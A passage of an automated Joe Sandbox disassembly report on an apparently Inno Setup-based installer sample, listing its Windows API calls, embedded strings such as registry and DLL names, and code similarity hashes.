                                                          • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041443E
                                                          Similarity
                                                          • API ID: A122A18830$A480
                                                          • String ID:
                                                          • API String ID: 3325508737-0
                                                          • Opcode ID: 2e378a44b9d760f9e5f1bf7c9b236df4e5f96ed4aa47b9fb48d5ba9b1bbdbb58
                                                          • Instruction ID: 53d1df8a90047df028643ee63be254e951aa3f987763a81c259c8cb4a1af4cbb
                                                          • Opcode Fuzzy Hash: 2e378a44b9d760f9e5f1bf7c9b236df4e5f96ed4aa47b9fb48d5ba9b1bbdbb58
                                                          • Instruction Fuzzy Hash: 7101D43520C3806AE600A63D8C85A9F6BDD9FC6314F05446EF484DB282C979C801C761
                                                          APIs
                                                            • Part of subcall function 0041F06C: GetActiveWindow.USER32 ref: 0041F06F
                                                            • Part of subcall function 0041F06C: GetCurrentThreadId.KERNEL32 ref: 0041F084
                                                            • Part of subcall function 0041F06C: 73A25940.USER32(00000000,Function_0001F048), ref: 0041F08A
                                                            • Part of subcall function 004231A0: GetSystemMetrics.USER32(00000000), ref: 004231A2
                                                          • OffsetRect.USER32(?,?,?), ref: 00424DC1
                                                          • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E84
                                                          • OffsetRect.USER32(?,?,?), ref: 00424E95
                                                            • Part of subcall function 0042355C: GetCurrentThreadId.KERNEL32 ref: 00423571
                                                            • Part of subcall function 0042355C: SetWindowsHookExA.USER32(00000003,00423518,00000000,00000000), ref: 00423581
                                                            • Part of subcall function 0042355C: CreateThread.KERNEL32(00000000,000003E8,004234C8,00000000,00000000), ref: 004235A5
                                                            • Part of subcall function 00424B24: SetTimer.USER32(00000000,00000001,?,004234AC), ref: 00424B3F
                                                          Strings
                                                          Similarity
                                                          • API ID: Thread$CurrentOffsetRect$A25940ActiveCreateDrawHookMetricsSystemTextTimerWindowWindows
                                                          • String ID: nLB
                                                          • API String ID: 1906964682-2031493005
                                                          • Opcode ID: d69f4dabb7a698d4e2161d5678524c276ca36ddb1998852898fe681b10175c4d
                                                          • Instruction ID: 6ccba84303d4583ac65c185f09da03f8435108134aba783506c2f58cc8f90ba1
                                                          • Opcode Fuzzy Hash: d69f4dabb7a698d4e2161d5678524c276ca36ddb1998852898fe681b10175c4d
                                                          • Instruction Fuzzy Hash: A7812871A00218CFDB14DFA8D884ADEBBF4FF88314F51416AE905AB296E778AD45CF44
                                                          APIs
                                                          • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00406FF3
                                                          • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040706D
                                                          • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070C5
                                                          Strings
                                                          Similarity
                                                          • API ID: Enum$NameOpenResourceUniversal
                                                          • String ID: Z
                                                          • API String ID: 3604996873-1505515367
                                                          • Opcode ID: 0cda032a99fccbc67731b5396545ffd3d82a8b59ae0714c8f86b613c94d89fe8
                                                          • Instruction ID: 6c201072c7e19ab920663406aa1001a3a7646b20d706545eb94c2f0a958ae389
                                                          • Opcode Fuzzy Hash: 0cda032a99fccbc67731b5396545ffd3d82a8b59ae0714c8f86b613c94d89fe8
                                                          • Instruction Fuzzy Hash: 17517070E04208ABDB11DF55C941A9EBBF9EF49304F1481BAE500BB3D1D778AE458B6A
                                                          APIs
                                                          • SetRectEmpty.USER32(?), ref: 0044D046
                                                          • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D071
                                                          • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D0F9
                                                          Strings
                                                          Similarity
                                                          • API ID: DrawText$EmptyRect
                                                          • String ID:
                                                          • API String ID: 182455014-2867612384
                                                          • Opcode ID: aa4c93a2d6761cb4316e3b9f58fd36adaf3be60b4be49a56ecc8a50fb57c6bd0
                                                          • Instruction ID: 2c01bf535b7fc2f64207dbeae616ffe24efc4250a83762b1f7dac36c1304b9fc
                                                          • Opcode Fuzzy Hash: aa4c93a2d6761cb4316e3b9f58fd36adaf3be60b4be49a56ecc8a50fb57c6bd0
                                                          • Instruction Fuzzy Hash: 6C517171E00248AFDB11DFA9C885BDEBBF8AF49308F14447AE845EB352D7389945CB64
                                                          APIs
                                                          • 73A1A570.USER32(00000000,00000000,0042F0C0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EF96
                                                            • Part of subcall function 0041A1E0: CreateFontIndirectA.GDI32(?), ref: 0041A29F
                                                          • SelectObject.GDI32(?,00000000), ref: 0042EFB9
                                                          • 73A1A480.USER32(00000000,?,0042F0A5,00000000,0042F09E,?,00000000,00000000,0042F0C0,?,?,?,?,00000000,00000000,00000000), ref: 0042F098
                                                          Strings
                                                          Similarity
                                                          • API ID: A480A570CreateFontIndirectObjectSelect
                                                          • String ID: ...\
                                                          • API String ID: 2998766281-983595016
                                                          • Opcode ID: aaeb4b64b252ec620ee19bd92df8033ea15f110d648c0c566ea30b5701249572
                                                          • Instruction ID: 43f07ddd406d3cd78f52d868909731211d08e22d210600ca561f601472f043fe
                                                          • Opcode Fuzzy Hash: aaeb4b64b252ec620ee19bd92df8033ea15f110d648c0c566ea30b5701249572
                                                          • Instruction Fuzzy Hash: A6318570B00128ABDB11DF99D841BAEB7F9FB48708F90447BF410A7392C7785E44CA59
                                                          APIs
                                                          • GetFileAttributesA.KERNEL32(00000000,0049806C,00000000,00497812,?,?,00000000,0049B628), ref: 0049778C
                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,0049806C,00000000,00497812,?,?,00000000,0049B628), ref: 004977B5
                                                          • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004977CE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: File$Attributes$Move
                                                          • String ID: isRS-%.3u.tmp
                                                          • API String ID: 3839737484-3657609586
                                                          • Opcode ID: 5e447f30b23232af434533287497b31b90de18d305760ab90fd2fc5e7a108e0f
                                                          • Instruction ID: cfa846df06bac921d3cc7342383d8013e9ea743293dbac669405f5124aadd281
                                                          • Opcode Fuzzy Hash: 5e447f30b23232af434533287497b31b90de18d305760ab90fd2fc5e7a108e0f
                                                          • Instruction Fuzzy Hash: 05213271E14209AFCF00EBA9C8859AFBBB8AF54314F51457AB414B72D1D6385E01CB59
                                                          APIs
                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                          • ExitProcess.KERNEL32 ref: 00404E0D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ExitMessageProcess
                                                          • String ID: Error$Runtime error at 00000000
                                                          • API String ID: 1220098344-2970929446
                                                          • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                          • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                          • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                          • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                          APIs
                                                            • Part of subcall function 0042C7FC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C820
                                                            • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                            • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                          • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456A70
                                                          • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456A9D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                          • String ID: LoadTypeLib$RegisterTypeLib
                                                          • API String ID: 1312246647-2435364021
                                                          • Opcode ID: e660801773f94f20b04beacac4d0dca05fe01ebd0f05b0c2a082d9499ce0d4df
                                                          • Instruction ID: dea98cbdfb45d66fad0868bd7db80167fcb8ebb816cd54e6ac056e4ed8ccdf78
                                                          • Opcode Fuzzy Hash: e660801773f94f20b04beacac4d0dca05fe01ebd0f05b0c2a082d9499ce0d4df
                                                          • Instruction Fuzzy Hash: A9119670B00604BFDB11DFA6CD51A5EB7BDEB8A705F518476BC04E3652DA389D04CA54
                                                          APIs
                                                          • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456F8E
                                                          • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045702B
                                                          Strings
                                                          • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456FBA
                                                          • Failed to create DebugClientWnd, xrefs: 00456FF4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                          • API String ID: 3850602802-3720027226
                                                          • Opcode ID: bc4e2302685a1611cdf589b1ebeb412e0de634acd2de00c3d71195a2fbe054b6
                                                          • Instruction ID: 364b6cfc2dd25a83f1288abab6954b7d1953a24f55fd1dbca2d44010d5bb0a44
                                                          • Opcode Fuzzy Hash: bc4e2302685a1611cdf589b1ebeb412e0de634acd2de00c3d71195a2fbe054b6
                                                          • Instruction Fuzzy Hash: 6D110471604240ABD310AB689C81B5F7BD49B15319F55403EFA849B3C3D3794C08C7BE
                                                          APIs
                                                            • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                          • GetFocus.USER32 ref: 004781EB
                                                          • GetKeyState.USER32(0000007A), ref: 004781FD
                                                          • WaitMessage.USER32(?,00000000,00478224,?,00000000,0047824B,?,?,00000001,00000000,?,?,?,0047FA10,00000000,004808CA), ref: 00478207
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: FocusMessageStateTextWaitWindow
                                                          • String ID: Wnd=$%x
                                                          • API String ID: 1381870634-2927251529
                                                          • Opcode ID: 84218ba3482459bc906772e13e797513dd116e5c3cf85ca98293f9821701720b
                                                          • Instruction ID: 5f1c8258d991fabeb8ce52e8cfeede19b84d8dc0ceec509adeab196e5a3e054a
                                                          • Opcode Fuzzy Hash: 84218ba3482459bc906772e13e797513dd116e5c3cf85ca98293f9821701720b
                                                          • Instruction Fuzzy Hash: C011C430644645AFC700FBA5D845A9E7BF8EB49304B5184BEF408E7651DB386D00CA69
                                                          APIs
                                                          • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E438
                                                          • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E447
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Time$File$LocalSystem
                                                          • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                          • API String ID: 1748579591-1013271723
                                                          • Opcode ID: 45f4a363f224ef8c5fed3f77cd0aa38b31e29c1c09915091c8c286ec18076b3a
                                                          • Instruction ID: 72319f5cb05664b7e116556de8a44c1f4f08e856cbf185e3f572017f7e9d6813
                                                          • Opcode Fuzzy Hash: 45f4a363f224ef8c5fed3f77cd0aa38b31e29c1c09915091c8c286ec18076b3a
                                                          • Instruction Fuzzy Hash: 3011F8A440C3919ED340DF6AC44432BBAE4AB99708F04896FF9C8D6381E779C948DB77
                                                          APIs
                                                          • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F57
                                                            • Part of subcall function 00406F40: DeleteFileA.KERNEL32(00000000,0049B628,00497BFD,00000000,00497C52,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F4B
                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 00453F7C
                                                            • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesDeleteErrorLastMove
                                                          • String ID: DeleteFile$MoveFile
                                                          • API String ID: 3024442154-139070271
                                                          • Opcode ID: b1543e803949c7e0bc7b6baa6fe4679c95893f4373d9700be0af1e5a7050e6bf
                                                          • Instruction ID: d61ccdf94e8101ca60a50ffa5b16d74e098655775539a7d8992e0f9997158dc0
                                                          • Opcode Fuzzy Hash: b1543e803949c7e0bc7b6baa6fe4679c95893f4373d9700be0af1e5a7050e6bf
                                                          • Instruction Fuzzy Hash: E6F062716041045BD701EBA2D94266EA3ECEB8430EFA0403BB900BB6C3DA3C9E09452D
                                                          APIs
                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004592C1,00000000,00459479,?,00000000,00000000,00000000), ref: 004591D1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen
                                                          • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                          • API String ID: 47109696-2631785700
                                                          • Opcode ID: a4f8ebe625aa4241feead5212253246ce33a71640870ef86989e33138b66f8c9
                                                          • Instruction ID: b3b7ca93e3ee9f71f5f4917cf459f66c0bdee831e94fc7924cf2246e82346dcf
                                                          • Opcode Fuzzy Hash: a4f8ebe625aa4241feead5212253246ce33a71640870ef86989e33138b66f8c9
                                                          • Instruction Fuzzy Hash: 11F0A431300151EBD710EB5AD895B5E7698DB95356F50453BF940CB253C67CCC058B59
                                                          APIs
                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                          • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004831C1
                                                          • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004831E4
                                                          Strings
                                                          • System\CurrentControlSet\Control\Windows, xrefs: 0048318E
                                                          • CSDVersion, xrefs: 004831B8
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                          • API String ID: 3677997916-1910633163
                                                          • Opcode ID: 8c4194736c198406f1c4615c9bef297240f0128b093a56b4b0574b173b8ea383
                                                          • Instruction ID: 86ea9b687bc925f919ffd8904499e524e0617f710df10bb4bfec30536caacf1e
                                                          • Opcode Fuzzy Hash: 8c4194736c198406f1c4615c9bef297240f0128b093a56b4b0574b173b8ea383
                                                          • Instruction Fuzzy Hash: 84F03175E40208A6DF10EAE18C49BAF73BCAB04F05F104567E910E7281EB7AAB048B59
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B2E,00000000,00453BD1,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FC1,00000000), ref: 0042D902
                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D908
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                          • API String ID: 1646373207-4063490227
                                                          • Opcode ID: 7b96dfeca4fb46ac12370e2a7164d548b2292eba5de3f20d368527ccba0e5576
                                                          • Instruction ID: 46d83308b3a0af851ef73fb55c1ff88b015d3a0f0a3b668622d7e336d39da5d8
                                                          • Opcode Fuzzy Hash: 7b96dfeca4fb46ac12370e2a7164d548b2292eba5de3f20d368527ccba0e5576
                                                          • Instruction Fuzzy Hash: F2E0DFE0B00B4122D720257A1C82B5B10894B84768FA0043B3888E52D6EDBCDD841A2D
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAC8), ref: 0042EB5A
                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB60
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                          • API String ID: 1646373207-260599015
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004980FE), ref: 0044F777
                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F77D
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: NotifyWinEvent$user32.dll
                                                          • API String ID: 1646373207-597752486
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498154,00000001,00000000,00498178), ref: 00497E7E
                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00497E84
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: DisableProcessWindowsGhosting$user32.dll
                                                          • API String ID: 1646373207-834958232
                                                          APIs
                                                            • Part of subcall function 0044B650: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F76D,004980FE), ref: 0044B677
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B68F
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A1
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6B3
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6C5
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6D7
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6E9
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B6FB
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B70D
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B71F
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B731
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B743
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B755
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B767
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B779
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B78B
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B79D
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7AF
                                                          • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498126), ref: 0046442B
                                                          • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464431
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoad
                                                          • String ID: SHPathPrepareForWriteA$shell32.dll
                                                          • API String ID: 2238633743-2683653824
                                                          APIs
                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0047CFD4,?,?,?,?,00000000,0047D129,?,?,?,00000000,?,0047D238), ref: 0047CFB0
                                                          • FindClose.KERNEL32(000000FF,0047CFDB,0047CFD4,?,?,?,?,00000000,0047D129,?,?,?,00000000,?,0047D238,00000000), ref: 0047CFCE
                                                          Similarity
                                                          • API ID: Find$CloseFileNext
                                                          • API String ID: 2066263336-0
                                                          APIs
                                                            • Part of subcall function 0042EE28: GetTickCount.KERNEL32 ref: 0042EE2E
                                                            • Part of subcall function 0042EC80: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECB5
                                                          • GetLastError.KERNEL32(00000000,00475509,?,?,0049C1D0,00000000), ref: 004753F2
                                                          Similarity
                                                          • API ID: CountErrorFileLastMoveTick
                                                          • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                          • API String ID: 2406187244-2685451598
                                                          APIs
                                                          • GetDesktopWindow.USER32 ref: 00413D3E
                                                          • GetDesktopWindow.USER32 ref: 00413DF6
                                                            • Part of subcall function 00418EB8: 6F59C6F0.COMCTL32(?,00000000,00413FBB,00000000,004140CB,?,?,0049B628), ref: 00418ED4
                                                            • Part of subcall function 00418EB8: ShowCursor.USER32(00000001,?,00000000,00413FBB,00000000,004140CB,?,?,0049B628), ref: 00418EF1
                                                          • SetCursor.USER32(00000000,?,?,?,?,00413AEB,00000000,00413AFE), ref: 00413E34
                                                          Similarity
                                                          • API ID: CursorDesktopWindow$Show
                                                          • API String ID: 2074268717-0
                                                          APIs
